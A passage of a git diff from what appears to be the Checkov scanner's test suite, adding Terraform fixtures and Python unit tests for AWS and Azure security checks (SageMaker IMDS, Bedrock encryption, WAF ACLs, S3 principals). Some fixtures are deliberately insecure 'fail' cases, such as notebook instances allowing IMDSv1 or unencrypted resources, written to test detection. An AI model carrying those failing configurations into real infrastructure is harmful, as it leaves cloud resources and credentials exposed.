+    ]
+  })
+}
+
+resource "aws_sagemaker_notebook_instance" "my_notebook_instance_pass" {
+  name           = "MyNotebookInstance"
+  instance_type  = "ml.t2.medium"
+  role_arn       = aws_iam_role.sagemaker_execution_role.arn
+
+  instance_metadata_service_configuration {
+    minimum_instance_metadata_service_version = "2"
+  }
+}
+
+resource "aws_sagemaker_notebook_instance" "my_notebook_instance_fail_1" {
+  name           = "MyNotebookInstance"
+  instance_type  = "ml.t2.medium"
+  role_arn       = aws_iam_role.sagemaker_execution_role.arn
+
+  instance_metadata_service_configuration {
+    minimum_instance_metadata_service_version = "1"
+  }
+}
+
+resource "aws_sagemaker_notebook_instance" "my_notebook_instance_fail_2" {
+  name           = "MyNotebookInstance"
+  instance_type  = "ml.t2.medium"
+  role_arn       = aws_iam_role.sagemaker_execution_role.arn
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/aws/example_SecurityGroupRuleDescription/main.tf b/tests/terraform/checks/resource/aws/example_SecurityGroupRuleDescription/main.tf
index 8d069a8a003..5b5cc2f7287 100644
--- a/tests/terraform/checks/resource/aws/example_SecurityGroupRuleDescription/main.tf
+++ b/tests/terraform/checks/resource/aws/example_SecurityGroupRuleDescription/main.tf
@@ -131,4 +131,4 @@ resource "aws_vpc_security_group_ingress_rule" "pass" {
   from_port   = 80
   ip_protocol = "tcp"
   to_port     = 8080
-}
\ No newline at end of file
+}
diff --git a/tests/terraform/checks/resource/aws/example_WAFACLCVE202144228/main.tf b/tests/terraform/checks/resource/aws/example_WAFACLCVE202144228/main.tf
index 98e812511b7..7c3ddfe6f69 100644
--- a/tests/terraform/checks/resource/aws/example_WAFACLCVE202144228/main.tf
+++ b/tests/terraform/checks/resource/aws/example_WAFACLCVE202144228/main.tf
@@ -265,3 +265,139 @@ resource "aws_wafv2_web_acl" "rule_group_count" {
     sampled_requests_enabled   = false
   }
 }
+
+
+#unknown
+resource "aws_wafv2_web_acl" "pass_dynamic" {
+  name  = "default-${var.scope}-web-acl"
+  scope = var.scope
+
+
+  default_action {
+    block {}
+  }
+
+
+  rule {
+    name     = "rule-${var.scope}-AWSManagedRulesCommonRuleSet"
+    priority = 1
+
+    override_action {
+      none {}
+    }
+
+    statement {
+      managed_rule_group_statement {
+        name        = "AWSManagedRulesCommonRuleSet"
+        vendor_name = "AWS"
+      }
+    }
+
+    visibility_config {
+      cloudwatch_metrics_enabled = true
+      metric_name                = "rule-${var.scope}-AWSManagedRulesCommonRuleSet"
+      sampled_requests_enabled   = true
+    }
+  }
+
+  rule {
+    name     = "AWS-AWSManagedRulesKnownBadInputsRuleSet"
+    priority = 2
+
+    override_action {
+      none {}
+    }
+
+    statement {
+      managed_rule_group_statement {
+        name        = "AWSManagedRulesKnownBadInputsRuleSet"
+        vendor_name = "AWS"
+      }
+    }
+
+    visibility_config {
+      cloudwatch_metrics_enabled = true
+      metric_name                = "rule-${var.scope}-AWSManagedRulesKnownBadInputsRuleSet"
+      sampled_requests_enabled   = true
+    }
+  }
+
+  dynamic "rule" {
+    for_each = var.dynamic_ip_set == "" ? [] : [1]
+
+    content {
+      name     = "rule-${var.scope}-ip-allowlist"
+      priority = 8
+
+      action {
+        allow {}
+      }
+
+      statement {
+        or_statement {
+          statement {
+            ip_set_reference_statement {
+              arn = aws_wafv2_ip_set.allow.arn
+            }
+          }
+          statement {
+            ip_set_reference_statement {
+              arn = data.aws_wafv2_ip_set.github-actions[0].arn
+            }
+          }
+        }
+      }
+
+      visibility_config {
+        cloudwatch_metrics_enabled = true
+        metric_name                = "rule-${var.scope}-ip-allowlist"
+        sampled_requests_enabled   = true
+      }
+    }
+  }
+
+
+  dynamic "rule" {
+    for_each = nonsensitive(var.review_token) == "" ? [] : [1]
+
+    content {
+      name     = "rule-${var.scope}-review-token-check"
+      priority = 30
+
+      action {
+        allow {}
+      }
+
+      statement {
+        byte_match_statement {
+          positional_constraint = "EXACTLY"
+          search_string         = var.review_token
+
+          field_to_match {
+            single_header {
+              name = "review-token"
+            }
+          }
+
+          text_transformation {
+            priority = 1
+            type     = "NONE"
+          }
+        }
+      }
+
+      visibility_config {
+        cloudwatch_metrics_enabled = true
+        metric_name                = "rule-${var.scope}-review-token-check"
+        sampled_requests_enabled   = true
+      }
+    }
+  }
+
+
+  visibility_config {
+    cloudwatch_metrics_enabled = true
+    metric_name                = "${var.scope}-web-acl"
+    sampled_requests_enabled   = true
+  }
+}
diff --git a/tests/terraform/checks/resource/aws/example_WAFRuleHasAnyActions/main.tf b/tests/terraform/checks/resource/aws/example_WAFRuleHasAnyActions/main.tf
index c5fabb97121..f2c229d7c52 100644
--- a/tests/terraform/checks/resource/aws/example_WAFRuleHasAnyActions/main.tf
+++ b/tests/terraform/checks/resource/aws/example_WAFRuleHasAnyActions/main.tf
@@ -326,4 +326,144 @@ resource "aws_waf_rule_group" "pass" {
     priority = 50
     rule_id  = aws_waf_rule.example.id
   }
+}
+
+variable "scope" {
+  type    = string # REGIONAL or CLOUDFRONT
+  default = "CLOUDFRONT"
+}
+
+
+resource "aws_wafv2_web_acl" "pass_dynamic" {
+  name  = "default-${var.scope}-web-acl"
+  scope = var.scope
+
+
+  default_action {
+    block {}
+  }
+
+
+  rule {
+    name     = "rule-${var.scope}-AWSManagedRulesCommonRuleSet"
+    priority = 1
+
+    override_action {
+      none {}
+    }
+
+    statement {
+      managed_rule_group_statement {
+        name        = "AWSManagedRulesCommonRuleSet"
+        vendor_name = "AWS"
+      }
+    }
+
+    visibility_config {
+      cloudwatch_metrics_enabled = true
+      metric_name                = "rule-${var.scope}-AWSManagedRulesCommonRuleSet"
+      sampled_requests_enabled   = true
+    }
+  }
+
+  rule {
+    name     = "AWS-AWSManagedRulesKnownBadInputsRuleSet"
+    priority = 2
+
+    override_action {
+      none {}
+    }
+
+    statement {
+      managed_rule_group_statement {
+        name        = "AWSManagedRulesKnownBadInputsRuleSet"
+        vendor_name = "AWS"
+      }
+    }
+
+    visibility_config {
+      cloudwatch_metrics_enabled = true
+      metric_name                = "rule-${var.scope}-AWSManagedRulesKnownBadInputsRuleSet"
+      sampled_requests_enabled   = true
+    }
+  }
+
+  dynamic "rule" {
+    for_each = var.dynamic_ip_set == "" ? [] : [1]
+
+    content {
+      name     = "rule-${var.scope}-ip-allowlist"
+      priority = 8
+
+      action {
+        allow {}
+      }
+
+      statement {
+        or_statement {
+          statement {
+            ip_set_reference_statement {
+              arn = aws_wafv2_ip_set.allow.arn
+            }
+          }
+          statement {
+            ip_set_reference_statement {
+              arn = data.aws_wafv2_ip_set.github-actions[0].arn
+            }
+          }
+        }
+      }
+
+      visibility_config {
+        cloudwatch_metrics_enabled = true
+        metric_name                = "rule-${var.scope}-ip-allowlist"
+        sampled_requests_enabled   = true
+      }
+    }
+  }
+
+
+  dynamic "rule" {
+    for_each = nonsensitive(var.review_token) == "" ? [] : [1]
+
+    content {
+      name     = "rule-${var.scope}-review-token-check"
+      priority = 30
+
+      action {
+        allow {}
+      }
+
+      statement {
+        byte_match_statement {
+          positional_constraint = "EXACTLY"
+          search_string         = var.review_token
+
+          field_to_match {
+            single_header {
+              name = "review-token"
+            }
+          }
+
+          text_transformation {
+            priority = 1
+            type     = "NONE"
+          }
+        }
+      }
+
+      visibility_config {
+        cloudwatch_metrics_enabled = true
+        metric_name                = "rule-${var.scope}-review-token-check"
+        sampled_requests_enabled   = true
+      }
+    }
+  }
+
+
+  visibility_config {
+    cloudwatch_metrics_enabled = true
+    metric_name                = "${var.scope}-web-acl"
+    sampled_requests_enabled   = true
+  }
 }
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/aws/test_APIGatewayMethodSettingCacheEncrypted.py b/tests/terraform/checks/resource/aws/test_APIGatewayMethodSettingCacheEncrypted.py
index 2e68408514f..7b8cce66ea7 100644
--- a/tests/terraform/checks/resource/aws/test_APIGatewayMethodSettingCacheEncrypted.py
+++ b/tests/terraform/checks/resource/aws/test_APIGatewayMethodSettingCacheEncrypted.py
@@ -17,6 +17,7 @@ def test(self):
 
         passing_resources = {
             "aws_api_gateway_method_settings.pass",
+            "aws_api_gateway_method_settings.pass2",
         }
         failing_resources = {
             "aws_api_gateway_method_settings.fail",
diff --git a/tests/terraform/checks/resource/aws/test_BedrockAgentEncrypted.py b/tests/terraform/checks/resource/aws/test_BedrockAgentEncrypted.py
new file mode 100644
index 00000000000..815715254d3
--- /dev/null
+++ b/tests/terraform/checks/resource/aws/test_BedrockAgentEncrypted.py
@@ -0,0 +1,38 @@
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.resource.aws.BedrockAgentEncrypted import check
+from checkov.terraform.runner import Runner
+
+
+class TestBedrockAgentEncrypted(unittest.TestCase):
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_BedrockAgentEncrypted"
+        report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            "aws_bedrockagent_agent.bedrock_agent_with_kms_key",
+        }
+        failing_resources = {
+            "aws_bedrockagent_agent.bedrock_agent",
+        }
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary["passed"], 1)
+        self.assertEqual(summary["failed"], 1)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/aws/test_CognitoUnauthenticatedIdentities.py b/tests/terraform/checks/resource/aws/test_CognitoUnauthenticatedIdentities.py
new file mode 100644
index 00000000000..c31275578df
--- /dev/null
+++ b/tests/terraform/checks/resource/aws/test_CognitoUnauthenticatedIdentities.py
@@ -0,0 +1,38 @@
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.resource.aws.CognitoUnauthenticatedIdentities import check
+from checkov.terraform.runner import Runner
+
+
+class TestCognitoUnauthenticatedIdentities(unittest.TestCase):
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_CognitoUnauthenticatedIdentities"
+        report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            "aws_cognito_identity_pool.pass",
+        }
+        failing_resources = {
+            "aws_cognito_identity_pool.fail",
+        }
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/terraform/checks/resource/aws/test_ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py b/tests/terraform/checks/resource/aws/test_ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py
index b17d2ce1fd0..75d43f2a50a 100644
--- a/tests/terraform/checks/resource/aws/test_ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py
+++ b/tests/terraform/checks/resource/aws/test_ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py
@@ -1,31 +1,42 @@
+import os
 import unittest
 
+from checkov.runner_filter import RunnerFilter
 from checkov.terraform.checks.resource.aws.ElasticacheReplicationGroupEncryptionAtTransitAuthToken import check
-from checkov.common.models.enums import CheckResult
+from checkov.terraform.runner import Runner
 
+class TestElasticacheReplicationGroupEncryptionAtTransitAuthToken(unittest.TestCase):
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
 
-class TestKMSRotation(unittest.TestCase):
+        test_files_dir = current_dir + "/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken"
+        report = runner.run(
+            root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])
+        )
+        summary = report.get_summary()
 
-    def test_success(self):
-        resource_conf = {'automatic_failover_enabled': [True], 'availability_zones': [['us-west-2a', 'us-west-2b']],
-                         'replication_group_id': ['tf-rep-group-1'],
-                         'replication_group_description': ['test description'], 'node_type': ['cache.m4.large'],
-                         'number_cache_clusters': [2], 'parameter_group_name': ['default.redis3.2'], 'port': [6379],
-                         'at_rest_encryption_enabled': [True], 'transit_encryption_enabled': [True],
-                         'auth_token': ['${var.auth_token}']}
-        scan_result = check.scan_resource_conf(conf=resource_conf)
-        self.assertEqual(CheckResult.PASSED, scan_result)
+        passing_resources = {
+            "aws_elasticache_replication_group.pass",
+            "aws_elasticache_replication_group.pass2",
+        }
+        failing_resources = {
+            "aws_elasticache_replication_group.fail",
+            "aws_elasticache_replication_group.fail2",
+            "aws_elasticache_replication_group.fail3",
+        }
 
-    def test_failure(self):
-        resource_conf = {'automatic_failover_enabled': [True], 'availability_zones': [['us-west-2a', 'us-west-2b']],
-                         'replication_group_id': ['tf-rep-group-1'],
-                         'replication_group_description': ['test description'], 'node_type': ['cache.m4.large'],
-                         'number_cache_clusters': [2], 'parameter_group_name': ['default.redis3.2'], 'port': [6379],
-                         'at_rest_encryption_enabled': [False], 'transit_encryption_enabled': [False],
-                         }
-        scan_result = check.scan_resource_conf(conf=resource_conf)
-        self.assertEqual(CheckResult.FAILED, scan_result)
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
 
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
 
-if __name__ == '__main__':
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
     unittest.main()
diff --git a/tests/terraform/checks/resource/aws/test_LaunchConfigurationEBSEncryption.py b/tests/terraform/checks/resource/aws/test_LaunchConfigurationEBSEncryption.py
index edf4dcc556b..1075a3601cb 100644
--- a/tests/terraform/checks/resource/aws/test_LaunchConfigurationEBSEncryption.py
+++ b/tests/terraform/checks/resource/aws/test_LaunchConfigurationEBSEncryption.py
@@ -31,7 +31,6 @@ def test(self):
             "aws_instance.fail4",
             "aws_instance.fail5",
             "aws_instance.fail_empty_root_list",
-            "aws_instance.fail_empty_ebs_list",
             "aws_launch_configuration.fail",
         }
 
@@ -39,7 +38,7 @@ def test(self):
         failed_check_resources = {c.resource for c in report.failed_checks}
 
         self.assertEqual(summary["passed"], 5)
-        self.assertEqual(summary["failed"], 8)
+        self.assertEqual(summary["failed"], 7)
         self.assertEqual(summary["skipped"], 0)
         self.assertEqual(summary["parsing_errors"], 0)
 
diff --git a/tests/terraform/checks/resource/aws/test_S3AllowsAnyPrincipal.py b/tests/terraform/checks/resource/aws/test_S3AllowsAnyPrincipal.py
index d4844967051..d2466d6b179 100644
--- a/tests/terraform/checks/resource/aws/test_S3AllowsAnyPrincipal.py
+++ b/tests/terraform/checks/resource/aws/test_S3AllowsAnyPrincipal.py
@@ -19,12 +19,22 @@ def test(self):
             "aws_s3_bucket.pass",
             "aws_s3_bucket.pass2",
             "aws_s3_bucket_policy.pass",
+            "aws_s3_bucket_policy.pass_w_condition",
+            "aws_s3_bucket.pass_w_condition",
+            "aws_s3_bucket_policy.pass_w_condition2",
+            "aws_s3_bucket.pass_w_condition2",
+            "aws_s3_bucket.pass_w_condition3",
+            "aws_s3_bucket.pass_w_condition4",
+            "aws_s3_bucket.pass_w_condition5",
+            "aws_s3_bucket.pass_w_condition6",
         }
         failing_resources = {
             "aws_s3_bucket.fail",
             "aws_s3_bucket.fail2",
             "aws_s3_bucket.fail3",
             "aws_s3_bucket_policy.fail",
+            "aws_s3_bucket.fail_w_condition",
+            "aws_s3_bucket_policy.fail_w_condition",
         }
 
         passed_check_resources = set([c.resource for c in report.passed_checks])
diff --git a/tests/terraform/checks/resource/aws/test_SSMParameterUsesCMK.py b/tests/terraform/checks/resource/aws/test_SSMParameterUsesCMK.py
index 6259e550763..d6d5fa05e6e 100644
--- a/tests/terraform/checks/resource/aws/test_SSMParameterUsesCMK.py
+++ b/tests/terraform/checks/resource/aws/test_SSMParameterUsesCMK.py
@@ -17,6 +17,7 @@ def test(self):
 
         passing_resources = {
             "aws_ssm_parameter.pass",
+            "aws_ssm_parameter.pass2",
         }
 
         failing_resources = {
diff --git a/tests/terraform/checks/resource/aws/test_SagemakerDataQualityJobDefinitionEncryption.py b/tests/terraform/checks/resource/aws/test_SagemakerDataQualityJobDefinitionEncryption.py
new file mode 100644
index 00000000000..868008e68b1
--- /dev/null
+++ b/tests/terraform/checks/resource/aws/test_SagemakerDataQualityJobDefinitionEncryption.py
@@ -0,0 +1,39 @@
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.resource.aws.SagemakerDataQualityJobDefinitionEncryption import check
+from checkov.terraform.runner import Runner
+
+class TestSagemakerDataQualityJobDefinitionEncryption(unittest.TestCase):
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_SagemakerDataQualityJobDefinitionEncryption"
+        report = runner.run(
+            root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])
+        )
+        summary = report.get_summary()
+
+        passing_resources = {
+            "aws_sagemaker_data_quality_job_definition.data_quality_job_pass",
+        }
+        failing_resources = {
+            "aws_sagemaker_data_quality_job_definition.data_quality_job_fail",
+        }
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary["passed"], 1)
+        self.assertEqual(summary["failed"], 1)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/terraform/checks/resource/aws/test_SagemakerDataQualityJobDefinitionTrafficEncryption.py b/tests/terraform/checks/resource/aws/test_SagemakerDataQualityJobDefinitionTrafficEncryption.py
new file mode 100644
index 00000000000..4da5ceb8f3c
--- /dev/null
+++ b/tests/terraform/checks/resource/aws/test_SagemakerDataQualityJobDefinitionTrafficEncryption.py
@@ -0,0 +1,40 @@
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.resource.aws.SagemakerDataQualityJobDefinitionTrafficEncryption import check
+from checkov.terraform.runner import Runner
+
+class TestSagemakerDataQualityJobDefinitionTrafficEncryption(unittest.TestCase):
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_SagemakerDataQualityJobDefinitionTrafficEncryption"
+        report = runner.run(
+            root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])
+        )
+        summary = report.get_summary()
+
+        passing_resources = {
+            "aws_sagemaker_data_quality_job_definition.data_quality_job_pass",
+        }
+        failing_resources = {
+            "aws_sagemaker_data_quality_job_definition.data_quality_job_fail_1",
+            "aws_sagemaker_data_quality_job_definition.data_quality_job_fail_2",
+        }
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary["passed"], 1)
+        self.assertEqual(summary["failed"], 2)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/terraform/checks/resource/aws/test_SagemakerDataQualityJobDefinitionVolumeEncryption.py b/tests/terraform/checks/resource/aws/test_SagemakerDataQualityJobDefinitionVolumeEncryption.py
new file mode 100644
index 00000000000..d647f915808
--- /dev/null
+++ b/tests/terraform/checks/resource/aws/test_SagemakerDataQualityJobDefinitionVolumeEncryption.py
@@ -0,0 +1,40 @@
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.resource.aws.SagemakerDataQualityJobDefinitionVolumeEncryption import check
+from checkov.terraform.runner import Runner
+
+class TestSagemakerDataQualityJobDefinitionVolumeEncryption(unittest.TestCase):
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_SagemakerDataQualityJobDefinitionVolumeEncryption"
+        report = runner.run(
+            root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])
+        )
+        summary = report.get_summary()
+
+        passing_resources = {
+            "aws_sagemaker_data_quality_job_definition.data_quality_job_pass",
+        }
+        failing_resources = {
+            "aws_sagemaker_data_quality_job_definition.data_quality_job_fail_1",
+            "aws_sagemaker_data_quality_job_definition.data_quality_job_fail_2",
+        }
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary["passed"], 1)
+        self.assertEqual(summary["failed"], 2)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/terraform/checks/resource/aws/test_SagemakerDomainEncryptedWithCMK.py b/tests/terraform/checks/resource/aws/test_SagemakerDomainEncryptedWithCMK.py
index 7b87c5f9a74..716ae01e2ce 100644
--- a/tests/terraform/checks/resource/aws/test_SagemakerDomainEncryptedWithCMK.py
+++ b/tests/terraform/checks/resource/aws/test_SagemakerDomainEncryptedWithCMK.py
@@ -18,16 +18,18 @@ def test(self):
 
         passing_resources = {
             "aws_sagemaker_domain.pass",
+            "aws_sagemaker_notebook_instance.pass",
         }
         failing_resources = {
             "aws_sagemaker_domain.fail",
+            "aws_sagemaker_notebook_instance.fail",
         }
 
         passed_check_resources = set([c.resource for c in report.passed_checks])
         failed_check_resources = set([c.resource for c in report.failed_checks])
 
-        self.assertEqual(summary["passed"], 1)
-        self.assertEqual(summary["failed"], 1)
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
         self.assertEqual(summary["skipped"], 0)
         self.assertEqual(summary["parsing_errors"], 0)
 
diff --git a/tests/terraform/checks/resource/aws/test_SagemakerFlowDefinitionUsesKMS.py b/tests/terraform/checks/resource/aws/test_SagemakerFlowDefinitionUsesKMS.py
new file mode 100644
index 00000000000..be487575b96
--- /dev/null
+++ b/tests/terraform/checks/resource/aws/test_SagemakerFlowDefinitionUsesKMS.py
@@ -0,0 +1,39 @@
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.resource.aws.SagemakerFlowDefinitionUsesKMS import check
+from checkov.terraform.runner import Runner
+
+class TestSagemakerFlowDefinitionUsesKMS(unittest.TestCase):
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_SagemakerFlowDefinitionUsesKMS"
+        report = runner.run(
+            root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])
+        )
+        summary = report.get_summary()
+
+        passing_resources = {
+            "aws_sagemaker_flow_definition.flow_pass",
+        }
+        failing_resources = {
+            "aws_sagemaker_flow_definition.flow_fail",
+        }
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary["passed"], 1)
+        self.assertEqual(summary["failed"], 1)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/terraform/checks/resource/aws/test_SagemakerModelWithNetworkIsolation.py b/tests/terraform/checks/resource/aws/test_SagemakerModelWithNetworkIsolation.py
new file mode 100644
index 00000000000..7c9a976a001
--- /dev/null
+++ b/tests/terraform/checks/resource/aws/test_SagemakerModelWithNetworkIsolation.py
@@ -0,0 +1,40 @@
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.resource.aws.SagemakerModelWithNetworkIsolation import check
+from checkov.terraform.runner import Runner
+
+class TestSagemakerModelWithNetworkIsolation(unittest.TestCase):
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_SagemakerModelWithNetworkIsolation"
+        report = runner.run(
+            root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])
+        )
+        summary = report.get_summary()
+
+        passing_resources = {
+            "aws_sagemaker_model.model_pass",
+        }
+        failing_resources = {
+            "aws_sagemaker_model.model_fail_1",
+            "aws_sagemaker_model.model_fail_2",
+        }
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary["passed"], 1)
+        self.assertEqual(summary["failed"], 2)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/terraform/checks/resource/aws/test_SagemakerNotebookInstanceAllowsIMDSv2.py b/tests/terraform/checks/resource/aws/test_SagemakerNotebookInstanceAllowsIMDSv2.py
new file mode 100644
index 00000000000..a69a7a62825
--- /dev/null
+++ b/tests/terraform/checks/resource/aws/test_SagemakerNotebookInstanceAllowsIMDSv2.py
@@ -0,0 +1,39 @@
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.resource.aws.SagemakerNotebookInstanceAllowsIMDSv2 import check
+from checkov.terraform.runner import Runner
+
+
+class TestSagemakerNotebookInstanceAllowsIMDSv2(unittest.TestCase):
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_SagemakerNotebookInstanceAllowsIMDSv2"
+        report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            "aws_sagemaker_notebook_instance.my_notebook_instance_pass",
+        }
+        failing_resources = {
+            "aws_sagemaker_notebook_instance.my_notebook_instance_fail_1",
+            "aws_sagemaker_notebook_instance.my_notebook_instance_fail_2",
+        }
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary["passed"], 1)
+        self.assertEqual(summary["failed"], 2)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/terraform/checks/resource/aws/test_WAFRuleHasAnyActions.py b/tests/terraform/checks/resource/aws/test_WAFRuleHasAnyActions.py
index 55b955750b5..f13d329b766 100644
--- a/tests/terraform/checks/resource/aws/test_WAFRuleHasAnyActions.py
+++ b/tests/terraform/checks/resource/aws/test_WAFRuleHasAnyActions.py
@@ -26,7 +26,8 @@ def test(self):
             'aws_wafv2_rule_group.pass',
             'aws_wafregional_rule_group.pass',
             'aws_waf_rule_group.pass',
-            'aws_wafv2_web_acl.pass_managed'
+            'aws_wafv2_web_acl.pass_managed',
+            'aws_wafv2_web_acl.pass_dynamic'
         }
 
         failing_resources = {
diff --git a/tests/terraform/checks/resource/azure/example_ACRDedicatedDataEndpointEnabled/main.tf b/tests/terraform/checks/resource/azure/example_ACRDedicatedDataEndpointEnabled/main.tf
new file mode 100644
index 00000000000..5abd8194e57
--- /dev/null
+++ b/tests/terraform/checks/resource/azure/example_ACRDedicatedDataEndpointEnabled/main.tf
@@ -0,0 +1,26 @@
+
+resource "azurerm_container_registry" "pass" {
+  name                      = "containerRegistry1"
+  resource_group_name       = azurerm_resource_group.rg.name
+  location                  = azurerm_resource_group.rg.location
+  sku                       = "Premium"
+  anonymous_pull_enabled    = false
+  data_endpoint_enabled = true
+}
+
+
+resource "azurerm_container_registry" "fail" {
+  name                = "containerRegistry1"
+  resource_group_name = azurerm_resource_group.rg.name
+  location            = azurerm_resource_group.rg.location
+  sku                 = "Premium"
+}
+
+
+resource "azurerm_container_registry" "fail2" {
+  name                      = "containerRegistry1"
+  resource_group_name       = azurerm_resource_group.rg.name
+  location                  = azurerm_resource_group.rg.location
+  sku                       = "Standard"
+  data_endpoint_enabled = false
+}
diff --git a/tests/terraform/checks/resource/azure/example_AppGWDefinesSecureProtocols/main.tf b/tests/terraform/checks/resource/azure/example_AppGWDefinesSecureProtocols/main.tf
index 8401795b241..c7a6812d2c0 100644
--- a/tests/terraform/checks/resource/azure/example_AppGWDefinesSecureProtocols/main.tf
+++ b/tests/terraform/checks/resource/azure/example_AppGWDefinesSecureProtocols/main.tf
@@ -410,4 +410,23 @@ resource "azurerm_application_gateway" "pass2" {
     policy_type = "Predefined"
     policy_name = "AppGwSslPolicy20220101S"
   }
+}
+
+resource "azurerm_application_gateway" "pass_dynamic_bug" {
+
+  enable_http2        = false
+  location            = ""
